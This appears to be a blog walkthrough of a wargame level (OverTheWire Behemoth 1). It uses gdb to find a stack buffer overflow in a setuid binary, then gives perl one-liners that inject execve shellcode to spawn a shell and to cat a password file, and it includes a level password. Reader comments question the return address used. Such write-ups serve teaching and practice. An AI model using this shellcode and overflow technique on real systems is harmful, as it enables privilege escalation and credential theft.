# Behemoth wargame: Level 1

# ssh behemoth1@behemoth.labs.overthewire.org
behemoth1@behemoth.labs.overthewire.org's password:61657365626f6f746976

behemoth1@melissa$ file /behemoth/behemoth1
/behemoth/behemoth1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth1@melissa$ gdb -q /behemoth/behemoth1
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080483f4 <+0>:     push   ebp
   0x080483f5 <+1>:     mov    ebp,esp
   0x080483f7 <+3>:     and    esp,0xfffffff0
   0x080483fa <+6>:     sub    esp,0x60
   0x080483fd <+9>:     mov    eax,0x80484f0
   0x08048402 <+14>:    mov    DWORD PTR [esp],eax
   0x08048405 <+17>:    call   0x8048320 
   0x0804840a <+22>:    lea    eax,[esp+0x1d]
   0x0804840e <+26>:    mov    DWORD PTR [esp],eax
   0x08048411 <+29>:    call   0x8048300 
   0x08048416 <+34>:    mov    DWORD PTR [esp],0x80484fc
   0x0804841d <+41>:    call   0x8048330 
   0x08048422 <+46>:    mov    eax,0x0
   0x08048427 <+51>:    leave
   0x08048428 <+52>:    ret
End of assembler dump.
(gdb) break *0x0804841d
Breakpoint 1 at 0x804841d
(gdb) run
Starting program: /behemoth/behemoth1
Password: aaa
Breakpoint 1, 0x0804841d in main ()
(gdb) print $esp+0x1d
$1 = (void *) 0xffffd6ed
(gdb) x/64xw $esp
0xffffd6d0:     0x080484fc      0x000a0000      0x00010000      0xf7fd2ff4
0xffffd6e0:     0xf7f80b19      0xf7ea2ab5      0xffffd6f8      0x61616165
0xffffd6f0:     0x00000000      0x08049600      0xffffd708      0x080482dc
0xffffd700:     0xf7fd2ff4      0x08049600      0xffffd738      0x08048449
0xffffd710:     0xf7ea2c3d      0xf7fd3324      0xf7fd2ff4      0xffffd738
0xffffd720:     0xf7ea2cb5      0xf7feed80      0x0804843b      0xf7fd2ff4
0xffffd730:     0x08048430      0x00000000      0xffffd7b8      0xf7e89e37
0xffffd740:     0x00000001      0xffffd7e4      0xffffd7ec      0xf7fdf420
0xffffd750:     0xffffffff      0xf7ffcff4      0x08048236      0x00000001
0xffffd760:     0xffffd7a0      0xf7fedd61      0xf7ffdad0      0xf7fd72e8
0xffffd770:     0x00000001      0xf7fd2ff4      0x00000000      0x00000000
0xffffd780:     0xffffd7b8      0x2dc68d1a      0x0353f50a      0x00000000
0xffffd790:     0x00000000      0x00000000      0x00000001      0x08048340
0xffffd7a0:     0x00000000      0xf7ff3f70      0xf7e89d5b      0xf7ffcff4
0xffffd7b0:     0x00000001      0x08048340      0x00000000      0x08048361
0xffffd7c0:     0x080483f4      0x00000001      0xffffd7e4      0x08048430
(gdb) print /x $ebp
$2 = 0xffffd738
(gdb) print 0xffffd73c-0xffffd6ed
$3 = 79
(gdb) quit
behemoth1@melissa$ (perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x53 . "\xfd\xd6\xff\xff"' ; cat ) | /behemoth/behemoth1
Password: Authentication failure.
/bin/cat /etc/behemoth_pass/behemoth2
behemoth1@melissa$ ln -s /etc/behemoth_pass/behemoth2 /tmp/b2p
behemoth1@melissa$ perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x2f\x62\x32\x70\x68\x2f\x74\x6d\x70\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80" . "\x90"x39 . "\xfd\xd6\xff\xff"' | /behemoth/behemoth1
Password: Authentication failure.


0xc said...

Why does the program exit immediately after exec without piping cat in a subshell?

alvin said...

Hi, why do you use the return address of "\xcd\xd6\xff\xff" (0xffffd6cd) when the input buffer of gets starts at 0xffffd6ed ?